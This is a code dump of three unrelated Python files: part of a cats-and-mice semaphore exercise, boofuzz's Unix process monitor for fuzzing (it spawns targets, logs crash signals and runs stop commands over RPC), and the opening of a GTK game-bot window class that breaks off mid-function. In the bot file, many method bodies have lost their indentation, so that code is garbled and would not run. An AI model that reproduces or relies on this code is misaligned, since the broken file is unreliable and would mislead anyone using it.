cats_in_eating_zone_access = Semaphore(1)
# One permit per bowl: at most one animal eats from a given bowl at a time.
permission_to_bowls = [Semaphore(1) for _ in range(number_of_bowls)]
# Gates that mice hold to keep cats from entering/leaving while mice are in.
permission_to_leave_for_cats = Semaphore(1)
permission_to_enter_for_cats = Semaphore(1)
# Turnstile serialising arrivals at the bowl zone.
permission_to_queue_up_for_bowl_zone = Semaphore(1)
def cat(id):
    """Cat thread: forever enter the bowl zone, eat from one random bowl, leave.

    NOTE(review): the parameter name shadows the builtin id(); left as-is
    to keep the code unchanged.
    """
    while True:
        # Pass the entry turnstile (blocks while a mouse holds it).
        permission_to_queue_up_for_bowl_zone.acquire()
        # Blocked while mice are inside: the first mouse in holds this lock.
        permission_to_enter_for_cats.acquire()
        cats_in_eating_zone_access.acquire()
        cats_in_eating_zone.append(id)
        print(f'Gato {id} está entrando a zona de platos')
        cats_in_eating_zone_access.release()
        permission_to_enter_for_cats.release()
        permission_to_queue_up_for_bowl_zone.release()
        # Eat from one randomly chosen bowl; each bowl is its own mutex.
        bowl_choice_index = randint(0, number_of_bowls - 1)
        permission_to_bowl = permission_to_bowls[bowl_choice_index]
        permission_to_bowl.acquire()
        print(f'Gato {id} está comiendo de plato {bowl_choice_index}')
        print(f'Gato {id} terminó de comer de plato {bowl_choice_index}')
        permission_to_bowl.release()
        # Leaving is gated too: mice inside the zone hold this lock.
        permission_to_leave_for_cats.acquire()
        cats_in_eating_zone_access.acquire()
        cats_in_eating_zone.remove(id)
        print(f'Gato {id} está dejando la zona de platos')
        cats_in_eating_zone_access.release()
        permission_to_leave_for_cats.release()
def mouse(id):
    """Mouse thread: eat from bowls until a cat already inside the zone catches it.

    NOTE(review): the parameter name shadows the builtin id(); left as-is.
    """
    caught_by_cat = False
    predator_cat = None
    while not caught_by_cat and not predator_cat:
        # Wait at the turnstile so a cat that is mid-entry finishes first.
        permission_to_queue_up_for_bowl_zone.acquire()
        permission_to_queue_up_for_bowl_zone.release()
        mice_in_eating_zone_access.acquire()
        if len(mice_in_eating_zone) == 0:
            # First mouse in: lock cats out of (and into) the zone, then
            # check for cats already inside -- if any, this mouse is caught.
            permission_to_enter_for_cats.acquire()
            permission_to_leave_for_cats.acquire()
            cats_in_eating_zone_access.acquire()
            if len(cats_in_eating_zone) > 0:
                caught_by_cat = True
                predator_cat = choice(cats_in_eating_zone)
            cats_in_eating_zone_access.release()
        mice_in_eating_zone.append(id)
        print(f'Ratón {id} está entrando a zona de platos')
        mice_in_eating_zone_access.release()
        # Eat from one randomly chosen bowl (a caught mouse still "eats" once).
        bowl_choice_index = randint(0, number_of_bowls - 1)
        permission_to_bowl = permission_to_bowls[bowl_choice_index]
        permission_to_bowl.acquire()
        print(f'Ratón {id} está comiendo de plato {bowl_choice_index}')
        print(f'Ratón {id} terminó de comer de plato {bowl_choice_index}')
        permission_to_bowl.release()
        mice_in_eating_zone_access.acquire()
        mice_in_eating_zone.remove(id)
        if caught_by_cat:
            print(f'Ratón {id} murió a garras de Gato {predator_cat}')
        else:
            print(f'Ratón {id} está dejando la zona de platos')
        if len(mice_in_eating_zone) == 0:
            # Last mouse out: allow cats to enter and leave again.
            permission_to_enter_for_cats.release()
            permission_to_leave_for_cats.release()
        mice_in_eating_zone_access.release()
## When the mouse threads start first
## Note that there is no starvation
for id in range(number_of_mice):
    Thread(target = mouse, args = [id]).start()
for id in range(number_of_cats):
    Thread(target = cat, args = [id]).start()
# ### When the cat threads start first
# for id in range(number_of_mice):
#     Thread(target = mouse, args = [id]).start()
# for id in range(number_of_cats):
#     Thread(target = cat, args = [id]).start()
# ### When cat and mouse threads are started together
# greater_number_of_animals = (
#     number_of_cats
#     if number_of_cats > number_of_mice
#     else number_of_mice
# )
# for id in range(greater_number_of_animals):
#     if id <= number_of_mice:
#         Thread(target = mouse, args = [id]).start()
#     if id <= number_of_cats:
#         Thread(target = cat, args = [id]).start()
|
process_monitor_unix.py
|
import os
import sys
import getopt
import signal
import time
import threading
import subprocess
from boofuzz import pedrpc
'''
By nnp
http://www.unprotectedhex.com
This is intended as a basic replacement for Sulley's process_monitor.py on *nix.
The below options are accepted. Crash details are limited to the signal that
caused the death and whatever operating system supported mechanism is in place (i.e
core dumps)
Replicated methods:
- alive
- log
- post_send
- pre_send
- start_target
- stop_target
- set_start_commands
- set_stop_commands
Limitations
- Cannot attach to an already running process
- Currently only accepts one start_command
- Limited 'crash binning'. Relies on the availability of core dumps. These
should be created in the same directory the process is run from on Linux
and in the (hidden) /cores directory on OS X. On OS X you have to add
the option COREDUMPS=-YES- to /etc/hostconfig and then `ulimit -c
unlimited` as far as I know. A restart may be required. The file
specified by crash_bin will record any other available details such as the test
that caused the crash and the signal received by the program
'''
# Command-line help text, printed via ERR() on bad or missing arguments.
USAGE = "USAGE: process_monitor_unix.py"\
        "\n -c|--crash_bin File to record crash info too" \
        "\n [-P|--port PORT] TCP port to bind this agent too"\
        "\n [-l|--log_level LEVEL] log level (default 1), increase for more verbosity"\
        "\n [-d|--coredump_dir dir] directory where coredumps are moved to "\
        "\n (you may need to adjust ulimits to create coredumps)"
def ERR(msg):
    """Print an error message to stderr and terminate with exit code 1.

    Replaces the old ``lambda msg: sys.stderr.write(...) or sys.exit(1)``:
    on Python 3, write() returns the (truthy) number of characters written,
    so the ``or sys.exit(1)`` branch was never reached and the process kept
    running after a fatal error.
    """
    sys.stderr.write("ERR> " + msg + "\n")
    sys.exit(1)
class DebuggerThread:
    def __init__(self, start_command):
        """
        This class isn't actually run as a thread, only the start_monitoring
        method is. It can spawn/stop a process, wait for it to exit and report
        on the exit status/code.

        Fixed for Python 3 compatibility (the original used ``print x``
        statements and ``basestring``, which are syntax/name errors on Py3);
        the code remains valid Python 2.

        @type  start_command: str or list
        @param start_command: Command used to spawn the target; a string is
            split on single spaces, a list is used verbatim.
        """
        self.start_command = start_command
        # basestring only exists on Python 2; fall back to str on Python 3.
        try:
            string_types = basestring  # noqa: F821
        except NameError:
            string_types = str
        if isinstance(start_command, string_types):
            self.tokens = start_command.split(' ')
        else:
            self.tokens = start_command
        self.cmd_args = []
        self.pid = None          # pid of the spawned target, set by spawn_target()
        self.exit_status = None  # raw waitpid status word, set by start_monitoring()
        self.alive = False

    def spawn_target(self):
        """Start the target process and mark it alive."""
        print(self.tokens)
        self.pid = subprocess.Popen(self.tokens).pid
        self.alive = True

    def start_monitoring(self):
        """
        Block until the spawned process exits, then record its raw exit
        status and mark it not alive. Intended to run in its own thread so
        the caller stays responsive (see NIXProcessMonitorPedrpcServer).
        """
        self.exit_status = os.waitpid(self.pid, 0)
        # waitpid returns (pid, status); keep only the 16-bit status word.
        self.exit_status = self.exit_status[1]
        self.alive = False

    def get_exit_status(self):
        """Return the recorded raw exit status (None while still running)."""
        return self.exit_status

    def stop_target(self):
        """Kill the target with SIGKILL; print (but otherwise ignore) kill errors."""
        try:
            os.kill(self.pid, signal.SIGKILL)
        except OSError as e:
            print(e.errno)
        else:
            self.alive = False

    def is_alive(self):
        """Return True while the spawned process has not been reaped."""
        return self.alive
class NIXProcessMonitorPedrpcServer(pedrpc.Server):
    """
    PED-RPC server that spawns, monitors and restarts a target process on
    *nix, recording crash synopses to a file and optionally collecting core
    dumps.

    Fixes over the original: ``os.WSTOPSIG`` (not ``os.WTERMSIG``) is used
    for stopped processes, the crash-record file is closed via ``with``, and
    printing uses the function form so the class also runs on Python 3.
    """

    def __init__(self, host, port, cbin, coredump_dir, level=1):
        """
        @type  host: str
        @param host: Hostname or IP address
        @type  port: int
        @param port: Port to bind server to
        @type  cbin: str
        @param cbin: Where to save monitored process crashes for analysis
        @type  coredump_dir: str
        @param coredump_dir: Directory to move core dumps into, or None to
            leave them where the OS created them
        @type  level: int
        @param level: Log verbosity threshold (default 1)
        """
        pedrpc.Server.__init__(self, host, port)
        self.crash_bin = cbin
        self.log_level = level
        self.dbg = None            # DebuggerThread wrapping the target process
        self.last_synopsis = None  # text of the most recent crash record
        self.test_number = 0
        self.start_commands = []
        self.stop_commands = []
        self.proc_name = None
        self.coredump_dir = coredump_dir
        self.log("Process Monitor PED-RPC server initialized:")
        self.log("Listening on %s:%s" % (host, port))
        self.log("awaiting requests...")

    # noinspection PyMethodMayBeStatic
    def alive(self):
        """
        Returns True. Useful for PED-RPC clients who want to see if the PED-RPC connection is still alive.
        """
        return True

    def log(self, msg="", level=1):
        """
        If the supplied message falls under the current log level, print the specified message to screen.

        @type  msg: str
        @param msg: Message to log
        @type  level: int
        @param level: Verbosity of this message; printed only when
            self.log_level >= level
        """
        if self.log_level >= level:
            print("[%s] %s" % (time.strftime("%I:%M.%S"), msg))

    def post_send(self):
        """
        This routine is called after the fuzzer transmits a test case and returns the status of the target.

        @rtype:  bool
        @return: Return True if the target is still active, False otherwise.
        """
        if not self.dbg.is_alive():
            exit_status = self.dbg.get_exit_status()
            # NOTE: the core-dump check runs first, so any core-dumping crash
            # is labelled 'Segmentation fault' regardless of the actual signal.
            if os.WCOREDUMP(exit_status):
                reason = 'Segmentation fault'
            elif os.WIFSTOPPED(exit_status):
                # Bug fix: WSTOPSIG holds the stop signal; the original used
                # WTERMSIG, which is only meaningful for terminated processes.
                reason = 'Stopped with signal ' + str(os.WSTOPSIG(exit_status))
            elif os.WIFSIGNALED(exit_status):
                reason = 'Terminated with signal ' + str(os.WTERMSIG(exit_status))
            elif os.WIFEXITED(exit_status):
                reason = 'Exit with code - ' + str(os.WEXITSTATUS(exit_status))
            else:
                reason = 'Process died for unknown reason'
            self.last_synopsis = '[%s] Crash : Test - %d Reason - %s\n' % (
                time.strftime("%I:%M.%S"),
                self.test_number,
                reason
            )
            # 'with' guarantees the crash record file is closed on all paths.
            with open(self.crash_bin, 'a') as rec_file:
                rec_file.write(self.last_synopsis)
            if self.coredump_dir is not None:
                dest = os.path.join(self.coredump_dir, str(self.test_number))
                src = self._get_coredump_path()
                if src is not None:
                    self.log("moving core dump %s -> %s" % (src, dest))
                    os.rename(src, dest)
        return self.dbg.is_alive()

    def _get_coredump_path(self):
        """
        This method returns the path to the coredump file if one was created
        (Linux drops './core' in the working directory), or None otherwise.
        """
        if sys.platform == 'linux' or sys.platform == 'linux2':
            path = './core'
            if os.path.isfile(path):
                return path
        return None

    def pre_send(self, test_number):
        """
        This routine is called before the fuzzer transmits a test case and ensure the debugger thread is operational.
        (In this implementation do nothing for now)

        @type  test_number: Integer
        @param test_number: Test number to retrieve PCAP for.
        """
        if not self.dbg:
            # lazily start the target on the first test case
            self.start_target()
        self.log("pre_send(%d)" % test_number, 10)
        self.test_number = test_number

    def start_target(self):
        """
        Start up the target process by issuing the commands in self.start_commands.

        @returns True if successful. No failure detection yet.
        """
        self.log("starting target process")
        self.dbg = DebuggerThread(self.start_commands[0])
        self.dbg.spawn_target()
        # prevent blocking by spawning off another thread to waitpid
        t = threading.Thread(target=self.dbg.start_monitoring)
        t.daemon = True
        t.start()
        self.log("done. target up and running, giving it 5 seconds to settle in.")
        time.sleep(5)
        return True

    def stop_target(self):
        """
        Kill the current debugger thread and stop the target process by issuing the commands in self.stop_commands.
        """
        # give the debugger thread a chance to exit.
        time.sleep(1)
        self.log("stopping target process")
        if len(self.stop_commands) < 1:
            # no custom stop commands configured: SIGKILL the target
            self.dbg.stop_target()
        else:
            for command in self.stop_commands:
                if command == "TERMINATE_PID":
                    self.dbg.stop_target()
                else:
                    os.system(command)

    def restart_target(self):
        """
        Stop and start the target process.

        @returns True if successful.
        """
        self.stop_target()
        return self.start_target()

    def set_start_commands(self, start_commands):
        """
        We expect start_commands to be a list with one element for example
        ['/usr/bin/program arg1 arg2 arg3']
        """
        if len(start_commands) > 1:
            self.log("This process monitor does not accept > 1 start command")
            return
        self.log("updating start commands to: %s" % start_commands)
        self.start_commands = start_commands

    def set_stop_commands(self, stop_commands):
        """Record the commands used by stop_target() to shut the target down."""
        self.log("updating stop commands to: %s" % stop_commands)
        self.stop_commands = stop_commands

    def set_proc_name(self, proc_name):
        """Record the target process name (informational only in this monitor)."""
        self.log("updating target process name to '%s'" % proc_name)
        self.proc_name = proc_name

    def get_crash_synopsis(self):
        """
        Return the last recorded crash synopsis.

        @rtype:  String
        @return: Synopsis of last recorded crash.
        """
        return self.last_synopsis
if __name__ == "__main__":
    # parse command line options.
    opts = None
    try:
        opts, args = getopt.getopt(sys.argv[1:], "c:P:l:d:", ["crash_bin=", "port=", "log_level=", "coredump_dir="])
    except getopt.GetoptError:
        ERR(USAGE)
    # defaults; only crash_bin is mandatory
    log_level = 1
    PORT = None
    crash_bin = None
    coredump_dir = None
    for opt, arg in opts:
        if opt in ("-c", "--crash_bin"):
            crash_bin = arg
        if opt in ("-P", "--port"):
            PORT = int(arg)
        if opt in ("-l", "--log_level"):
            log_level = int(arg)
        if opt in ("-d", "--coredump_dir"):
            coredump_dir = arg
    if not crash_bin:
        ERR(USAGE)
    if not PORT:
        PORT = 26002
    if coredump_dir is not None and not os.path.isdir(coredump_dir):
        ERR("coredump_dir must be an existing directory")
    # spawn the PED-RPC servlet.
    servlet = NIXProcessMonitorPedrpcServer("0.0.0.0", PORT, crash_bin, coredump_dir, log_level)
    servlet.serve_forever()
|
main.py
|
# Dindo Bot
# Copyright (c) 2018 - 2019 AXeL
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk, GdkPixbuf, GObject
from lib import tools, logger, data, parser, settings, accounts, maps
from threads.bot import BotThread
from lib.shared import LogType, DebugLevel, __program_name__
from .dev import DevToolsWidget
from .custom import *
from .dialog import *
from threading import Thread
class BotWindow(Gtk.ApplicationWindow):
    def __init__(self, title=__program_name__):
        """Build the main bot window: state, header bar, tabs, signal handlers."""
        GObject.threads_init() # allow threads to update GUI
        Gtk.Window.__init__(self, title=title)
        logger.add_separator()
        # Initialise class attributes
        self.game_window = None
        self.game_area = None
        self.bot_path = None
        self.bot_thread = None
        self.args = tools.get_cmd_args()
        # Get settings
        self.settings = settings.load()
        # Header Bar
        self.create_header_bar(title)
        # Tables
        self.htable = Gtk.Table(1, 3, True) # horizontal table
        self.vtable = Gtk.Table(4, 1, True) # vertical table
        self.htable.attach(self.vtable, 1, 3, 0, 1)
        self.add(self.htable)
        # Tabs
        self.create_tabs()
        # Window
        self.set_icon_from_file(tools.get_full_path('icons/drago.png'))
        self.set_size_request(900, 700)
        self.set_resizable(False)
        self.connect('key-press-event', self.on_key_press)
        self.connect('configure-event', self.on_resize_or_move)
        self.connect('window-state-event', self.on_minimize)
        self.connect('destroy', Gtk.main_quit)
        self.show_all()
        self.unplug_button.hide()
        # Hide optional UI pieces according to the user's settings
        if not self.settings['Debug']['Enabled']:
            self.debug_page.hide()
        if not self.settings['Job']['EnablePodBar']:
            self.podbar_box.hide()
        if not self.settings['Job']['EnableMiniMap']:
            self.minimap_box.hide()
def on_key_press(self, widget, event):
if self.settings['EnableShortcuts']:
# get keyname
keyname = Gdk.keyval_name(event.keyval)
ctrl = (event.state & Gdk.ModifierType.CONTROL_MASK)
alt = (event.state & Gdk.ModifierType.MOD1_MASK)
shift = (event.state & Gdk.ModifierType.SHIFT_MASK)
# handle shortcuts
for action in self.settings['Shortcuts']:
value = self.settings['Shortcuts'][action]
if value is not None:
keys = value.split('+')
if (len(keys) == 1 and keys[0] == keyname) or (len(keys) == 2 and ((keys[0] == 'Ctrl' and ctrl) or (keys[0] == 'Alt' and alt) or (keys[0] == 'Shift' and shift)) and keys[1] == keyname):
# run actions
if action == 'Start':
self.start_button.emit('clicked')
elif action == 'Pause':
self.pause_button.emit('clicked')
elif action == 'Stop':
self.stop_button.emit('clicked')
elif action == 'Minimize':
self.iconify()
elif action == 'Take Game Screenshot':
self.take_screenshot_button.emit('clicked')
elif action == 'Focus Game':
self.focus_game()
# stop event propagation
return True
# focus game
if self.bot_thread and self.bot_thread.isAlive():
self.focus_game()
def on_minimize(self, widget, event):
if event.window.get_state() == Gdk.WindowState.ICONIFIED:
self.pause_bot()
    def on_resize_or_move(self, widget, event):
        # 'configure-event' handler (see __init__): any window move/resize
        # pauses the bot.
        self.pause_bot()
def pop(self, text_buffer, max=100):
start_iter = text_buffer.get_start_iter()
end_iter = text_buffer.get_end_iter()
lines = text_buffer.get_text(start_iter, end_iter, True).splitlines()
if len(lines) >= max:
new_text = '\n'.join(lines[1:]) + '\n' # [1:] to remove the first line
text_buffer.set_text(new_text)
def log(self, text, type=LogType.Normal):
# pop first line if we reached the max number of lines
self.pop(self.log_buf)
# append to text view
position = self.log_buf.get_end_iter()
new_text = '[' + tools.get_time() + '] ' + text + '\n'
if type == LogType.Success:
self.log_buf.insert_with_tags(position, new_text, self.green_text_tag)
elif type == LogType.Error:
self.log_buf.insert_with_tags(position, new_text, self.red_text_tag)
elif type == LogType.Info:
self.log_buf.insert_with_tags(position, new_text, self.blue_text_tag)
else:
self.log_buf.insert(position, new_text)
# call logger
if type == LogType.Error:
logger.error(text)
else:
logger.new_entry(text)
def debug(self, text, level=DebugLevel.Normal):
# append to text view
if self.settings['Debug']['Enabled'] and level >= self.settings['Debug']['Level']:
self.pop(self.debug_buf)
position = self.debug_buf.get_end_iter()
self.debug_buf.insert(position, '[' + tools.get_time() + '] ' + text + '\n')
logger.debug(text)
def on_about_button_clicked(self, button):
dialog = AboutDialog(transient_for=self)
dialog.run()
def on_preferences_button_clicked(self, button):
dialog = PreferencesDialog(transient_for=self)
dialog.run()
def on_accounts_button_clicked(self, button):
dialog = AccountsDialog(transient_for=self)
dialog.run()
def on_take_screenshot_button_clicked(self, button):
if self.game_window:
screenshot_name = 'screenshot_' + tools.get_date_time()
screenshot_path = tools.get_full_path(screenshot_name)
tools.take_window_screenshot(self.game_window, screenshot_path)
self.log("Screenshot saved to '%s'" % screenshot_path, LogType.Info)
    def create_header_bar(self, title):
        """Build the header bar: app icon, title and the settings popover menu."""
        ### Header Bar
        hb = Gtk.HeaderBar(title=title)
        hb.pack_start(Gtk.Image(file=tools.get_full_path('icons/drago_24.png')))
        hb.set_show_close_button(True)
        self.set_titlebar(hb)
        ## Settings button
        self.settings_button = Gtk.Button()
        self.settings_button.set_image(Gtk.Image(icon_name='document-properties'))
        self.settings_button.connect('clicked', lambda button: self.popover.show_all())
        hb.pack_end(self.settings_button)
        # Popover menu anchored below the settings button
        self.popover = Gtk.Popover(relative_to=self.settings_button, position=Gtk.PositionType.BOTTOM)
        self.popover.set_border_width(2)
        box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
        self.popover.add(box)
        # Preferences button
        preferences_button = Gtk.ModelButton(' Preferences')
        preferences_button.set_alignment(0, 0.5)
        preferences_button.set_image(Gtk.Image(icon_name='preferences-desktop'))
        preferences_button.connect('clicked', self.on_preferences_button_clicked)
        box.add(preferences_button)
        # Accounts button
        accounts_button = Gtk.ModelButton(' Accounts')
        accounts_button.set_alignment(0, 0.5)
        accounts_button.set_image(Gtk.Image(icon_name='dialog-password'))
        accounts_button.connect('clicked', self.on_accounts_button_clicked)
        box.add(accounts_button)
        # Take Game Screenshot button (insensitive until a game window is set)
        self.take_screenshot_button = Gtk.ModelButton(' Take Game Screenshot')
        self.take_screenshot_button.set_alignment(0, 0.5)
        self.take_screenshot_button.set_image(Gtk.Image(icon_name='camera-photo'))
        self.take_screenshot_button.set_sensitive(False)
        self.take_screenshot_button.connect('clicked', self.on_take_screenshot_button_clicked)
        box.add(self.take_screenshot_button)
        # Open Log File button
        open_log_button = Gtk.ModelButton(' Open Log File')
        open_log_button.set_alignment(0, 0.5)
        open_log_button.set_image(Gtk.Image(icon_name='text-x-generic'))
        open_log_button.connect('clicked', lambda button: tools.open_file_in_editor(logger.get_filename()))
        box.add(open_log_button)
        # About button
        about_button = Gtk.ModelButton(' About')
        about_button.set_alignment(0, 0.5)
        about_button.set_image(Gtk.Image(icon_name='help-about'))
        about_button.connect('clicked', self.on_about_button_clicked)
        box.add(about_button)
def log_view_auto_scroll(self, textview, event):
adj = textview.get_vadjustment()
adj.set_value(adj.get_upper() - adj.get_page_size())
def debug_view_auto_scroll(self, textview, event):
adj = textview.get_vadjustment()
adj.set_value(adj.get_upper() - adj.get_page_size())
def create_tabs(self):
log_notebook = Gtk.Notebook()
log_notebook.set_border_width(2)
self.vtable.attach(log_notebook, 0, 1, 3, 4)
bot_notebook = Gtk.Notebook()
bot_notebook.set_border_width(2)
self.htable.attach(bot_notebook, 0, 1, 0, 1)
# Log Tab/Page
log_page = Gtk.ScrolledWindow()
self.log_view = Gtk.TextView()
self.log_view.set_border_width(5)
self.log_view.set_editable(False)
self.log_view.set_wrap_mode(Gtk.WrapMode.WORD)
self.log_view.connect('size-allocate', self.log_view_auto_scroll)
self.log_buf = self.log_view.get_buffer()
self.red_text_tag = self.log_buf.create_tag('red', foreground='#dc3545')
self.green_text_tag = self.log_buf.create_tag('green', foreground='#28a745')
self.blue_text_tag = self.log_buf.create_tag('blue', foreground='#007bff')
log_page.add(self.log_view)
log_notebook.append_page(log_page, Gtk.Label('Log'))
# Debug Tab
self.debug_page = Gtk.ScrolledWindow()
self.debug_view = Gtk.TextView()
self.debug_view.set_border_width(5)
self.debug_view.set_editable(False)
self.debug_view.set_wrap_mode(Gtk.WrapMode.WORD)
self.debug_view.modify_bg(Gtk.StateType.NORMAL, Gdk.color_parse('black'))
self.debug_view.modify_fg(Gtk.StateType.NORMAL, Gdk.color_parse('white'))
self.debug_view.connect('size-allocate', self.debug_view_auto_scroll)
self.debug_buf = self.debug_view.get_buffer()
self.debug_page.add(self.debug_view)
log_notebook.append_page(self.debug_page, Gtk.Label('Debug'))
# Dev tools Tab
if '--dev' in self.args:
dev_tools_page = DevToolsWidget(self)
log_notebook.append_page(dev_tools_page, Gtk.Label('Dev Tools'))
log_notebook.show_all()
log_notebook.set_current_page(2)
### Bot Tab
bot_page = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
bot_page.set_border_width(10)
bot_notebook.append_page(bot_page, Gtk.Label('Bot'))
self.bot_widgets = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
bot_page.add(self.bot_widgets)
## Game Window
self.bot_widgets.add(Gtk.Label('<b>Game Window</b>', xalign=0, use_markup=True))
game_window_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
self.bot_widgets.add(game_window_box)
# ComboBox
self.game_window_combo = Gtk.ComboBoxText()
self.game_window_combo.set_margin_left(10)
self.populate_game_window_combo()
self.game_window_combo.connect('changed', self.on_game_window_combo_changed)
game_window_box.pack_start(self.game_window_combo, True, True, 0)
# Refresh
self.refresh_button = Gtk.Button()
self.refresh_button.set_image(Gtk.Image(icon_name='view-refresh'))
self.refresh_button.set_tooltip_text('Refresh')
self.refresh_button.connect('clicked', self.on_refresh_button_clicked)
game_window_box.add(self.refresh_button)
# Unplug
self.unplug_button = Gtk.Button()
self.unplug_button.set_image(Gtk.Image(icon_name='view-restore'))
self.unplug_button.set_tooltip_text('Unplug')
self.unplug_button.connect('clicked', self.on_unplug_button_clicked)
game_window_box.add(self.unplug_button)
# Plug
if '--dev' in self.args:
self.plug_button = Gtk.Button()
self.plug_button.set_image(Gtk.Image(icon_name='window-new-symbolic'))
self.plug_button.set_tooltip_text('Plug')
self.plug_button.connect('clicked', self.on_plug_button_clicked)
game_window_box.add(self.plug_button)
## Bot Path
self.bot_widgets.add(Gtk.Label('<b>Bot Path</b>', xalign=0, use_markup=True))
bot_path_filechooserbutton = FileChooserButton(title='Choose bot path', filter=('Bot Path', '*.path'))
bot_path_filechooserbutton.set_margin_left(10)
bot_path_filechooserbutton.set_current_folder(tools.get_full_path('paths'))
bot_path_filechooserbutton.connect('file-set', self.on_bot_path_changed)
self.bot_widgets.add(bot_path_filechooserbutton)
## Start From Step
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.set_margin_left(10)
self.bot_widgets.add(hbox)
hbox.add(Gtk.Label('Start From Step'))
self.step_spin_button = SpinButton(min=1, max=1000)
self.step_spin_button.set_margin_left(10)
hbox.pack_end(self.step_spin_button, False, False, 0)
## Repeat Path
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.set_margin_left(10)
hbox.add(Gtk.Label('Repeat Path'))
self.bot_widgets.add(hbox)
# Switch
self.repeat_switch = Gtk.Switch()
self.repeat_switch.connect('notify::active', lambda switch, pspec: self.repeat_spin_button.set_sensitive(switch.get_active()))
vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
vbox.pack_start(self.repeat_switch, True, False, 0)
hbox.add(vbox)
# SpinButton
self.repeat_spin_button = SpinButton(min=2, max=1000)
self.repeat_spin_button.set_tooltip_text('Number of times')
self.repeat_spin_button.set_sensitive(False)
hbox.pack_end(self.repeat_spin_button, False, False, 0)
## Connect To Account
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('<b>Connect To Account</b>', xalign=0, use_markup=True))
self.bot_widgets.add(hbox)
# Switch
self.connect_to_account_switch = Gtk.Switch()
self.connect_to_account_switch.connect('notify::active', lambda switch, pspec: self.connect_to_account_box.set_sensitive(switch.get_active()))
hbox.pack_end(self.connect_to_account_switch, False, False, 0)
# Box
self.connect_to_account_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
self.connect_to_account_box.set_margin_left(10)
self.connect_to_account_box.set_sensitive(False)
self.bot_widgets.add(self.connect_to_account_box)
# Account
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('Account'))
self.connect_to_account_box.add(hbox)
# Combo
accounts_list = accounts.load()
self.accounts_combo = TextValueComboBox(accounts_list, model=Gtk.ListStore(str, int), text_key='login', value_key='id', sort_key='position')
self.accounts_combo.set_size_request(120, -1)
hbox.pack_end(self.accounts_combo, False, False, 0)
# Disconnect after
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('Disconnect after'))
self.connect_to_account_box.add(hbox)
# Switch
self.disconnect_after_switch = Gtk.Switch()
hbox.pack_end(self.disconnect_after_switch, False, False, 0)
## Pod
self.podbar_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
bot_page.add(self.podbar_box)
self.podbar_box.add(Gtk.Label('<b>Pod</b>', xalign=0, use_markup=True))
vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self.podbar_box.pack_start(vbox, True, True, 0)
self.podbar = Gtk.ProgressBar()
vbox.pack_start(self.podbar, True, False, 0)
## MiniMap
self.minimap_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
bot_page.add(self.minimap_box)
self.minimap_box.add(Gtk.Label('<b>MiniMap</b>', xalign=0, use_markup=True))
self.minimap = MiniMap(grid_size=(18, 18))
self.minimap.set_size_request(-1, 210)
self.minimap.set_margin_left(10)
self.minimap_box.add(self.minimap)
## Start
button_box = ButtonBox(centered=True, linked=True)
bot_page.pack_end(button_box, False, False, 0)
self.start_button = Gtk.Button()
self.start_button.set_tooltip_text('Start')
self.start_button.set_image(Gtk.Image(icon_name='media-playback-start'))
self.start_button.connect('clicked', self.on_start_button_clicked)
button_box.add(self.start_button)
## Pause
self.pause_button = Gtk.Button()
self.pause_button.set_image(Gtk.Image(icon_name='media-playback-pause'))
self.pause_button.set_tooltip_text('Pause')
self.pause_button.set_sensitive(False)
self.pause_button.connect('clicked', self.on_pause_button_clicked)
button_box.add(self.pause_button)
## Stop
self.stop_button = Gtk.Button()
self.stop_button.set_image(Gtk.Image(icon_name='media-playback-stop'))
self.stop_button.set_tooltip_text('Stop')
self.stop_button.set_sensitive(False)
self.stop_button.connect('clicked', self.on_stop_button_clicked)
button_box.add(self.stop_button)
### Path Tab
path_page = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
path_page.set_border_width(10)
bot_notebook.append_page(path_page, Gtk.Label('Path'))
## Movement
path_page.add(Gtk.Label('<b>Movement</b>', xalign=0, use_markup=True))
button_box = ButtonBox(orientation=Gtk.Orientation.VERTICAL, centered=True)
path_page.add(button_box)
# Up
up_button = Gtk.Button()
up_button.set_image(Gtk.Image(icon_name='go-up'))
up_button.connect('clicked', lambda button: self.path_listbox.append_text('Move(UP)'))
button_box.add(up_button)
# Left
left_button = Gtk.Button()
left_button.set_image(Gtk.Image(icon_name='go-previous'))
left_button.connect('clicked', lambda button: self.path_listbox.append_text('Move(LEFT)'))
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=40)
hbox.add(left_button)
button_box.add(hbox)
# Right
right_button = Gtk.Button()
right_button.set_image(Gtk.Image(icon_name='go-next'))
right_button.connect('clicked', lambda buton: self.path_listbox.append_text('Move(RIGHT)'))
hbox.add(right_button)
# Down
down_button = Gtk.Button()
down_button.set_image(Gtk.Image(icon_name='go-down'))
down_button.connect('clicked', lambda button: self.path_listbox.append_text('Move(DOWN)'))
button_box.add(down_button)
## Action
path_page.add(Gtk.Label('<b>Action</b>', xalign=0, use_markup=True))
stack_listbox = StackListBox()
path_page.add(stack_listbox)
## Enclos
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/enclos.png'), 24, 24)
image = Gtk.Image(pixbuf=pixbuf)
label = ImageLabel(image, 'Enclos')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Location
widget.add(Gtk.Label('<b>Location</b>', xalign=0, use_markup=True))
self.enclos_location_combo = CustomComboBox(data.Enclos, sort=True)
self.enclos_location_combo.set_margin_left(10)
widget.add(self.enclos_location_combo)
# Type
widget.add(Gtk.Label('<b>Type</b>', xalign=0, use_markup=True))
